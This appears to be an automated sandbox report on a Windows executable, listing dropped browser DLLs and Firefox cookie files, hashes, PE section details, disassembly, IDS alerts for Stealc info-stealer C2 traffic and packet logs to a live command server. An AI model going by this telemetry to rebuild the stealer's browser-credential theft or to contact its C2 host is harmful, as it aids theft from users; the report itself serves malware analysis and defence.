SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94757177564248
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'876'480 bytes
MD5:	7f275c6abf9ee064febb9736bfb047f2
SHA1:	5c93982f849358223f1472caf1ed8f2061a66616
SHA256:	747c903a9c783a32613d454bc73e8911525fe3b3f0c72b138458ab7f9fbe1cb1
SHA512:	cda88ba64f11c67d372a9398eb949fc328e48551fa4b48d2095bd32c86daed1c18f1aea6817e9bd4ad887e7c5c87cffcda5de66aed33da95c0e238a78794f53f
SSDEEP:	49152:ckVAooLtdIs2ioLW/NrC5lvRQ0lukTFe:X2ooBJC5lfy
TLSH:	E995332D7FB348ADC0E56BB99686FE47B0F5661050E08EB02186C5E1DCB3D924FED14A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaaf000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F6B3891EE1Ah
jo 00007F6B3891EE32h
add byte ptr [eax], al
jmp 00007F6B38920E15h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
inc dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	d87c45cb5437ddbd64b3fa7c48ac0662	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2ac000	0x200	24d39524723dc50d1ef33a4959e7a8da	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kcvavvdu	0x50a000	0x1a4000	0x1a4000	5f4ea61bb477285d496931ad2617b6b6	False	0.9947841099330357	data	7.953400500755208	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yzcfswdr	0x6ae000	0x1000	0x400	691088e748d78abdf6981785af852d53	False	0.85546875	data	6.43784509496584	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6af000	0x3000	0x2200	b56032a04ce3f17d9afd2981b3f7ef69	False	0.06295955882352941	DOS executable (COM)	0.7537739854650476	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T11:33:24.532355+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:24.754629+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:24.761223+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.9	49705	TCP
2024-09-26T11:33:24.978688+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:24.985606+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.9	49705	TCP
2024-09-26T11:33:25.978634+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:26.456036+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:32.431922+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:33.453502+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:34.146917+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:34.673950+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:36.318591+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP
2024-09-26T11:33:36.821628+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.9	49705	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 11:33:23.581645012 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:23.587142944 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:23.587265015 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:23.587415934 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:23.592250109 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.284938097 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.285054922 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.289377928 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.294269085 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.532283068 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.532355070 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.534288883 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.539239883 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.754513979 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.754528999 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.754628897 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.756417990 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.761223078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978470087 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978487015 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978498936 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978553057 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978564024 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978574991 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:24.978688002 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.980817080 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:24.985605955 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.200521946 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.200599909 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:25.227961063 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:25.228039980 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:25.232770920 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.232836008 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.232889891 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.232933998 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.233027935 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.233185053 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.233196020 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.233207941 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.978530884 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:25.978634119 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.238163948 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.242996931 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.455903053 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.455965996 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.455977917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.455991030 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456008911 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456022978 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456032991 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456036091 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.456082106 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.456116915 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.456906080 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456926107 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456938028 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456949949 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456960917 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.456969976 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.456990004 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.457017899 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581351042 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581389904 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581402063 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581413984 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581425905 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581495047 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581532001 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581614017 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581646919 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581660032 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581674099 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581703901 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581723928 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581737041 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.581770897 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.581798077 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.582511902 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.582546949 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.582561016 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.582576990 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.582597971 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.582619905 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.582628965 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.582642078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.582675934 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.582686901 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.583446980 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.583461046 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.583472967 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.583487034 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.583498001 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.583519936 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.583565950 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.584283113 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.584304094 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.584315062 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.584350109 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.584377050 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.706389904 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706437111 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706448078 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706465960 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706479073 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706490993 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706501961 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706511974 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.706546068 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.706584930 CEST	49705	80	192.168.2.9	185.215.113.37
Sep 26, 2024 11:33:26.706984997 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.706999063 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707010984 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707060099 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707072020 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707084894 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707098007 CEST	80	49705	185.215.113.37	192.168.2.9
Sep 26, 2024 11:33:26.707185984 CEST	49705	80	192.168.2.9	185.215.113.37
